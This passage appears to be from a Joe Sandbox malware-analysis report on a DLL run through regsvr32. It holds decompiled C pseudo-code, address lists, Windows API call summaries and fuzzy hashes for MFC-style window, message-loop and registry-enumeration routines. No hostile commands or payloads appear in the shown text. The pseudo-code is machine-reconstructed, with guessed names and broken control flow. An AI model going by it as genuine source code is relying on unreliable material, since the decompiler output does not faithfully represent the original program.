                                                                                                        0x1000bdd8
                                                                                                        0x1000bddd
                                                                                                        0x1000bddf
                                                                                                        0x1000bde1
                                                                                                        0x1000bde8
                                                                                                        0x1000bdea
                                                                                                        0x1000bdea
                                                                                                        0x1000bded
                                                                                                        0x1000bded
                                                                                                        0x1000bdd2
                                                                                                        0x1000bdf2
                                                                                                        0x1000bdf5
                                                                                                        0x1000bed2
                                                                                                        0x1000bed8
                                                                                                        0x1000bee0
                                                                                                        0x1000bee1
                                                                                                        0x1000bee2
                                                                                                        0x1000beeb
                                                                                                        0x1000bef0
                                                                                                        0x1000bef7
                                                                                                        0x1000bdfb
                                                                                                        0x1000bdfd
                                                                                                        0x1000be03
                                                                                                        0x1000be05
                                                                                                        0x1000be0c
                                                                                                        0x1000be14
                                                                                                        0x1000be1f
                                                                                                        0x1000be22
                                                                                                        0x1000be27
                                                                                                        0x1000be2f
                                                                                                        0x1000be33
                                                                                                        0x1000be34
                                                                                                        0x1000be39
                                                                                                        0x1000be3c
                                                                                                        0x1000be40
                                                                                                        0x1000be44
                                                                                                        0x1000be45
                                                                                                        0x1000be53
                                                                                                        0x1000be57
                                                                                                        0x1000be5f
                                                                                                        0x1000be65
                                                                                                        0x1000be66
                                                                                                        0x1000be73
                                                                                                        0x1000be79
                                                                                                        0x1000be7b
                                                                                                        0x1000be90
                                                                                                        0x1000be95
                                                                                                        0x1000be9a
                                                                                                        0x1000be9b
                                                                                                        0x1000be9c
                                                                                                        0x1000be9c
                                                                                                        0x1000bea4
                                                                                                        0x1000bea4
                                                                                                        0x1000beb6
                                                                                                        0x1000bec2
                                                                                                        0x1000beca
                                                                                                        0x1000becd
                                                                                                        0x00000000
                                                                                                        0x1000be07
                                                                                                        0x1000a0db
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000a123
                                                                                                        0x1000be05

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1000BDB7
                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
                                                                                                        • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                        • String ID: Software\
                                                                                                        • API String ID: 3878845136-964853688
                                                                                                        • Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
                                                                                                        • Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
                                                                                                        • Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
                                                                                                        • Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
                                                                                                        				struct HWND__* _v4;
                                                                                                        				struct tagMSG* _v8;
                                                                                                        				int _v12;
                                                                                                        				int _v16;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HWND__* _t42;
                                                                                                        				struct tagMSG* _t43;
                                                                                                        				signed int _t45;
                                                                                                        				void* _t48;
                                                                                                        				void* _t50;
                                                                                                        				int _t53;
                                                                                                        				long _t56;
                                                                                                        				signed int _t62;
                                                                                                        				intOrPtr* _t64;
                                                                                                        				intOrPtr* _t67;
                                                                                                        				void* _t68;
                                                                                                        
                                                                                                        				_t63 = __ecx;
                                                                                                        				_t62 = 1;
                                                                                                        				_t67 = __ecx;
                                                                                                        				_v12 = 1;
                                                                                                        				_v16 = 0;
                                                                                                        				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
                                                                                                        					_t62 = 0;
                                                                                                        				}
                                                                                                        				_t42 = GetParent( *(_t67 + 0x20));
                                                                                                        				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
                                                                                                        				_v4 = _t42;
                                                                                                        				_t43 = E1000B519(0);
                                                                                                        				_t68 = UpdateWindow;
                                                                                                        				_v8 = _t43;
                                                                                                        				while(1) {
                                                                                                        					L14:
                                                                                                        					_t73 = _v12;
                                                                                                        					if(_v12 == 0) {
                                                                                                        						goto L15;
                                                                                                        					}
                                                                                                        					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
                                                                                                        					if(__eflags != 0) {
                                                                                                        						while(1) {
                                                                                                        							L15:
                                                                                                        							_t45 = E1000B911(_t63, 0, _t67, _t73);
                                                                                                        							if(_t45 == 0) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							if(_t62 != 0) {
                                                                                                        								_t53 = _v8->message;
                                                                                                        								if(_t53 == 0x118 || _t53 == 0x104) {
                                                                                                        									E100128D7(_t67, 1);
                                                                                                        									UpdateWindow( *(_t67 + 0x20));
                                                                                                        									_t62 = 0;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t64 = _t67;
                                                                                                        							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
                                                                                                        							_t79 = _t48;
                                                                                                        							if(_t48 == 0) {
                                                                                                        								_t39 = _t67 + 0x3c;
                                                                                                        								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
                                                                                                        								__eflags =  *_t39;
                                                                                                        								return  *((intOrPtr*)(_t67 + 0x44));
                                                                                                        							} else {
                                                                                                        								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
                                                                                                        								_pop(_t63);
                                                                                                        								if(_t50 != 0) {
                                                                                                        									_v12 = 1;
                                                                                                        									_v16 = 0;
                                                                                                        								}
                                                                                                        								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                        									continue;
                                                                                                        								} else {
                                                                                                        									goto L14;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_push(0);
                                                                                                        						E1000A5E4();
                                                                                                        						return _t45 | 0xffffffff;
                                                                                                        					}
                                                                                                        					__eflags = _t62;
                                                                                                        					if(_t62 != 0) {
                                                                                                        						_t63 = _t67;
                                                                                                        						E100128D7(_t67, 1);
                                                                                                        						UpdateWindow( *(_t67 + 0x20));
                                                                                                        						_t62 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					}
                                                                                                        					__eflags = _a4 & 0x00000001;
                                                                                                        					if((_a4 & 0x00000001) == 0) {
                                                                                                        						__eflags = _v4;
                                                                                                        						if(_v4 != 0) {
                                                                                                        							__eflags = _v16;
                                                                                                        							if(_v16 == 0) {
                                                                                                        								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					__eflags = _a4 & 0x00000002;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						L13:
                                                                                                        						_v12 = 0;
                                                                                                        						continue;
                                                                                                        					} else {
                                                                                                        						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
                                                                                                        						_v16 = _v16 + 1;
                                                                                                        						__eflags = _t56;
                                                                                                        						if(__eflags != 0) {
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        						goto L13;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				goto L15;
                                                                                                        			}






















                                                                                                        0x1000f6f2
                                                                                                        0x1000f6fb
                                                                                                        0x1000f703
                                                                                                        0x1000f705
                                                                                                        0x1000f709
                                                                                                        0x1000f70d
                                                                                                        0x1000f71b
                                                                                                        0x1000f71b
                                                                                                        0x1000f720
                                                                                                        0x1000f726
                                                                                                        0x1000f72a
                                                                                                        0x1000f72e
                                                                                                        0x1000f733
                                                                                                        0x1000f739
                                                                                                        0x1000f7b1
                                                                                                        0x1000f7b1
                                                                                                        0x1000f7b1
                                                                                                        0x1000f7b5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f74d
                                                                                                        0x1000f74f
                                                                                                        0x1000f7b7
                                                                                                        0x1000f7b7
                                                                                                        0x1000f7b7
                                                                                                        0x1000f7be
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f7c2
                                                                                                        0x1000f7c8
                                                                                                        0x1000f7d0
                                                                                                        0x1000f7dd
                                                                                                        0x1000f7e5
                                                                                                        0x1000f7e7
                                                                                                        0x1000f7e7
                                                                                                        0x1000f7d0
                                                                                                        0x1000f7eb
                                                                                                        0x1000f7ed
                                                                                                        0x1000f7f3
                                                                                                        0x1000f7f5
                                                                                                        0x1000f830
                                                                                                        0x1000f830
                                                                                                        0x1000f830
                                                                                                        0x00000000
                                                                                                        0x1000f7f7
                                                                                                        0x1000f7fb
                                                                                                        0x1000f802
                                                                                                        0x1000f803
                                                                                                        0x1000f805
                                                                                                        0x1000f80d
                                                                                                        0x1000f80d
                                                                                                        0x1000f821
                                                                                                        0x00000000
                                                                                                        0x1000f823
                                                                                                        0x00000000
                                                                                                        0x1000f823
                                                                                                        0x1000f821
                                                                                                        0x1000f7f5
                                                                                                        0x1000f825
                                                                                                        0x1000f826
                                                                                                        0x00000000
                                                                                                        0x1000f82b
                                                                                                        0x1000f751
                                                                                                        0x1000f753
                                                                                                        0x1000f757
                                                                                                        0x1000f759
                                                                                                        0x1000f761
                                                                                                        0x1000f763
                                                                                                        0x1000f763
                                                                                                        0x1000f763
                                                                                                        0x1000f765
                                                                                                        0x1000f76a
                                                                                                        0x1000f76c
                                                                                                        0x1000f770
                                                                                                        0x1000f772
                                                                                                        0x1000f776
                                                                                                        0x1000f785
                                                                                                        0x1000f785
                                                                                                        0x1000f776
                                                                                                        0x1000f770
                                                                                                        0x1000f78b
                                                                                                        0x1000f790
                                                                                                        0x1000f7ad
                                                                                                        0x1000f7ad
                                                                                                        0x00000000
                                                                                                        0x1000f792
                                                                                                        0x1000f79f
                                                                                                        0x1000f7a5
                                                                                                        0x1000f7a9
                                                                                                        0x1000f7ab
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f7ab
                                                                                                        0x1000f790
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 1000F720
                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F747
                                                                                                        • UpdateWindow.USER32(?), ref: 1000F761
                                                                                                        • SendMessageA.USER32(?,00000121,00000000,?), ref: 1000F785
                                                                                                        • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 1000F79F
                                                                                                        • UpdateWindow.USER32(?), ref: 1000F7E5
                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F819
                                                                                                          • Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                        • String ID:
                                                                                                        • API String ID: 2853195852-0
                                                                                                        • Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
                                                                                                        • Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
                                                                                                        • Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
                                                                                                        • Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
                                                                                                        				long _v4;
                                                                                                        				char _v28;
                                                                                                        				intOrPtr _v40;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				long _t20;
                                                                                                        				long _t21;
                                                                                                        				struct HWND__* _t22;
                                                                                                        				long _t23;
                                                                                                        				struct HWND__* _t24;
                                                                                                        				long _t25;
                                                                                                        				struct HWND__* _t26;
                                                                                                        				void* _t33;
                                                                                                        				void* _t35;
                                                                                                        				long _t39;
                                                                                                        				long _t41;
                                                                                                        				intOrPtr _t43;
                                                                                                        				struct HWND__* _t47;
                                                                                                        				struct HWND__* _t49;
                                                                                                        				long _t51;
                                                                                                        				long _t53;
                                                                                                        
                                                                                                        				_t46 = __edi;
                                                                                                        				_t39 = __ecx;
                                                                                                        				_t37 = __ebx;
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
                                                                                                        					_t51 = E1000A7CE();
                                                                                                        					__eflags = _t51;
                                                                                                        					if(_t51 != 0) {
                                                                                                        						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
                                                                                                        						__eflags = _t20;
                                                                                                        						_t41 = _t51;
                                                                                                        						_pop(_t52);
                                                                                                        						if(_t20 != 0) {
                                                                                                        							_t53 = _t41;
                                                                                                        							_t21 =  *(_t53 + 0x64);
                                                                                                        							__eflags = _t21;
                                                                                                        							if(_t21 == 0) {
                                                                                                        								_pop(_t52);
                                                                                                        								goto L12;
                                                                                                        							} else {
                                                                                                        								__eflags = _t21 - 0x3f107;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
                                                                                                        									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
                                                                                                        								}
                                                                                                        								return _t21;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							L12:
                                                                                                        							_push(_t41);
                                                                                                        							_push(_t37);
                                                                                                        							_push(0);
                                                                                                        							_push(_t52);
                                                                                                        							_push(_t46);
                                                                                                        							_v4 = _t41;
                                                                                                        							_t22 = GetCapture();
                                                                                                        							_t51 = SendMessageA;
                                                                                                        							_t37 = 0x365;
                                                                                                        							while(1) {
                                                                                                        								_t47 = _t22;
                                                                                                        								__eflags = _t47;
                                                                                                        								if(_t47 == 0) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t23 = SendMessageA(_t47, _t37, 0, 0);
                                                                                                        								__eflags = _t23;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									L27:
                                                                                                        									return _t23;
                                                                                                        								} else {
                                                                                                        									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L33;
                                                                                                        							}
                                                                                                        							_t24 = GetFocus();
                                                                                                        							while(1) {
                                                                                                        								_t46 = _t24;
                                                                                                        								__eflags = _t46;
                                                                                                        								if(_t46 == 0) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t23 = SendMessageA(_t46, _t37, 0, 0);
                                                                                                        								__eflags = _t23;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									goto L27;
                                                                                                        								} else {
                                                                                                        									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L33;
                                                                                                        							}
                                                                                                        							_t39 = _v4;
                                                                                                        							_t25 = E10010DEC(_t37, _t39, _t46);
                                                                                                        							__eflags = _t25;
                                                                                                        							if(_t25 != 0) {
                                                                                                        								_t26 = GetLastActivePopup( *(_t25 + 0x20));
                                                                                                        								while(1) {
                                                                                                        									_t49 = _t26;
                                                                                                        									__eflags = _t49;
                                                                                                        									_push(0);
                                                                                                        									if(_t49 == 0) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									_t23 = SendMessageA(_t49, _t37, 0, ??);
                                                                                                        									__eflags = _t23;
                                                                                                        									if(__eflags == 0) {
                                                                                                        										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
                                                                                                        										continue;
                                                                                                        									}
                                                                                                        									goto L27;
                                                                                                        								}
                                                                                                        								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
                                                                                                        								goto L27;
                                                                                                        							} else {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						L1:
                                                                                                        						_push(0);
                                                                                                        						_push(_t39);
                                                                                                        						_v28 = 0x10057298;
                                                                                                        						E10017C83( &_v28, 0x1002e2fc);
                                                                                                        						asm("int3");
                                                                                                        						_push(4);
                                                                                                        						E10017BC1(E10027DEC, _t37, _t46, _t51);
                                                                                                        						_t43 = E10013965(0x104);
                                                                                                        						_v40 = _t43;
                                                                                                        						_t33 = 0;
                                                                                                        						_v28 = 0;
                                                                                                        						if(_t43 != 0) {
                                                                                                        							_t33 = E1000CF71(_t43);
                                                                                                        						}
                                                                                                        						return E10017C60(_t33);
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					__eflags = __eax - 0x3f107;
                                                                                                        					if(__eax != 0x3f107) {
                                                                                                        						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
                                                                                                        					}
                                                                                                        					return __eax;
                                                                                                        				}
                                                                                                        				L33:
                                                                                                        			}
























                                                                                                        0x1000ae8a
                                                                                                        0x1000ae8a
                                                                                                        0x1000ae8a
                                                                                                        0x1000ae8f
                                                                                                        0x1000aeaa
                                                                                                        0x1000aeac
                                                                                                        0x1000aeae
                                                                                                        0x1000aeb9
                                                                                                        0x1000aebf
                                                                                                        0x1000aec1
                                                                                                        0x1000aec3
                                                                                                        0x1000aec4
                                                                                                        0x100142c8
                                                                                                        0x100142ca
                                                                                                        0x100142cd
                                                                                                        0x100142cf
                                                                                                        0x100142f1
                                                                                                        0x00000000
                                                                                                        0x100142d1
                                                                                                        0x100142d1
                                                                                                        0x100142d6
                                                                                                        0x100142d8
                                                                                                        0x100142e9
                                                                                                        0x100142e9
                                                                                                        0x100142f0
                                                                                                        0x100142f0
                                                                                                        0x1000aec6
                                                                                                        0x10014229
                                                                                                        0x10014229
                                                                                                        0x1001422a
                                                                                                        0x1001422b
                                                                                                        0x1001422c
                                                                                                        0x1001422d
                                                                                                        0x1001422e
                                                                                                        0x10014232
                                                                                                        0x10014238
                                                                                                        0x1001423e
                                                                                                        0x10014257
                                                                                                        0x10014257
                                                                                                        0x10014259
                                                                                                        0x1001425b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001424b
                                                                                                        0x1001424d
                                                                                                        0x1001424f
                                                                                                        0x100142c1
                                                                                                        0x100142c6
                                                                                                        0x10014251
                                                                                                        0x10014252
                                                                                                        0x00000000
                                                                                                        0x10014252
                                                                                                        0x00000000
                                                                                                        0x1001424f
                                                                                                        0x1001425d
                                                                                                        0x10014275
                                                                                                        0x10014275
                                                                                                        0x10014277
                                                                                                        0x10014279
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014269
                                                                                                        0x1001426b
                                                                                                        0x1001426d
                                                                                                        0x00000000
                                                                                                        0x1001426f
                                                                                                        0x10014270
                                                                                                        0x00000000
                                                                                                        0x10014270
                                                                                                        0x00000000
                                                                                                        0x1001426d
                                                                                                        0x1001427b
                                                                                                        0x1001427f
                                                                                                        0x10014284
                                                                                                        0x10014286
                                                                                                        0x10014290
                                                                                                        0x100142a7
                                                                                                        0x100142a7
                                                                                                        0x100142a9
                                                                                                        0x100142ab
                                                                                                        0x100142ac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001429b
                                                                                                        0x1001429d
                                                                                                        0x1001429f
                                                                                                        0x100142a2
                                                                                                        0x00000000
                                                                                                        0x100142a2
                                                                                                        0x00000000
                                                                                                        0x1001429f
                                                                                                        0x100142bf
                                                                                                        0x00000000
                                                                                                        0x10014288
                                                                                                        0x00000000
                                                                                                        0x10014288
                                                                                                        0x10014286
                                                                                                        0x1000aeb0
                                                                                                        0x1000a0db
                                                                                                        0x1000a0db
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000a123
                                                                                                        0x1000ae91
                                                                                                        0x1000ae91
                                                                                                        0x1000ae96
                                                                                                        0x00000000
                                                                                                        0x1000ae9d
                                                                                                        0x1000aea3
                                                                                                        0x1000aea3
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetCapture.USER32 ref: 10014232
                                                                                                        • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 1001424B
                                                                                                        • GetFocus.USER32 ref: 1001425D
                                                                                                        • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 10014269
                                                                                                        • GetLastActivePopup.USER32(?), ref: 10014290
                                                                                                        • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 1001429B
                                                                                                        • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 100142BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                        • String ID:
                                                                                                        • API String ID: 3219385341-0
                                                                                                        • Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
                                                                                                        • Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
                                                                                                        • Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
                                                                                                        • Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000FC8A(intOrPtr* __ecx) {
                                                                                                        				struct HWND__* _v40;
                                                                                                        				struct HWND__* _v44;
                                                                                                        				intOrPtr _v48;
                                                                                                        				void* _v52;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				long _t43;
                                                                                                        				struct HWND__* _t48;
                                                                                                        				long _t61;
                                                                                                        				intOrPtr* _t63;
                                                                                                        				signed int _t64;
                                                                                                        				void* _t69;
                                                                                                        				intOrPtr _t71;
                                                                                                        				intOrPtr* _t72;
                                                                                                        
                                                                                                        				_t72 = __ecx;
                                                                                                        				_t69 = E1000B510();
                                                                                                        				if(_t69 != 0) {
                                                                                                        					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                                                                                                        						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                                                        					}
                                                                                                        					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                                                                                                        						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                                                                                                        				if(_t63 != 0) {
                                                                                                        					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                                                        					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                                                        				}
                                                                                                        				_t64 =  *(_t72 + 0x4c);
                                                                                                        				if(_t64 != 0) {
                                                                                                        					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                                                        				}
                                                                                                        				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                                                                                                        				_t83 =  *(_t72 + 0x3c) & 1;
                                                                                                        				if(( *(_t72 + 0x3c) & 1) != 0) {
                                                                                                        					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
                                                                                                        					if(_t71 != 0) {
                                                                                                        						_t85 =  *(_t71 + 0x20);
                                                                                                        						if( *(_t71 + 0x20) != 0) {
                                                                                                        							E100174D0(_t71,  &_v52, 0, 0x30);
                                                                                                        							_t48 =  *(_t72 + 0x20);
                                                                                                        							_v44 = _t48;
                                                                                                        							_v40 = _t48;
                                                                                                        							_v52 = 0x28;
                                                                                                        							_v48 = 1;
                                                                                                        							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                                                                                                        				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
                                                                                                        				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                                                                                                        					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                                                        					if(_t43 != 0) {
                                                                                                        						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				E1000FBD6(_t61, _t72);
                                                                                                        				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                                                        			}



















                                                                                                        0x1000fc93
                                                                                                        0x1000fc9a
                                                                                                        0x1000fca0
                                                                                                        0x1000fca5
                                                                                                        0x1000fcca
                                                                                                        0x1000fcca
                                                                                                        0x1000fcd0
                                                                                                        0x1000fcd2
                                                                                                        0x1000fcd2
                                                                                                        0x1000fcd0
                                                                                                        0x1000fcd5
                                                                                                        0x1000fcda
                                                                                                        0x1000fcde
                                                                                                        0x1000fce1
                                                                                                        0x1000fce1
                                                                                                        0x1000fce4
                                                                                                        0x1000fcec
                                                                                                        0x1000fcf1
                                                                                                        0x1000fcf1
                                                                                                        0x1000fcf4
                                                                                                        0x1000fcf8
                                                                                                        0x1000fcfb
                                                                                                        0x1000fd02
                                                                                                        0x1000fd07
                                                                                                        0x1000fd09
                                                                                                        0x1000fd0d
                                                                                                        0x1000fd17
                                                                                                        0x1000fd1c
                                                                                                        0x1000fd22
                                                                                                        0x1000fd25
                                                                                                        0x1000fd36
                                                                                                        0x1000fd3d
                                                                                                        0x1000fd40
                                                                                                        0x1000fd40
                                                                                                        0x1000fd0d
                                                                                                        0x1000fd07
                                                                                                        0x1000fd56
                                                                                                        0x1000fd58
                                                                                                        0x1000fd67
                                                                                                        0x1000fd73
                                                                                                        0x1000fd77
                                                                                                        0x1000fd7f
                                                                                                        0x1000fd7f
                                                                                                        0x1000fd77
                                                                                                        0x1000fd87
                                                                                                        0x1000fd9a

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 1000FD17
                                                                                                        • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 1000FD40
                                                                                                        • GetWindowLongA.USER32 ref: 1000FD52
                                                                                                        • GetWindowLongA.USER32 ref: 1000FD63
                                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 1000FD7F
                                                                                                        Strings
                                                                                                        Memory Dump Source
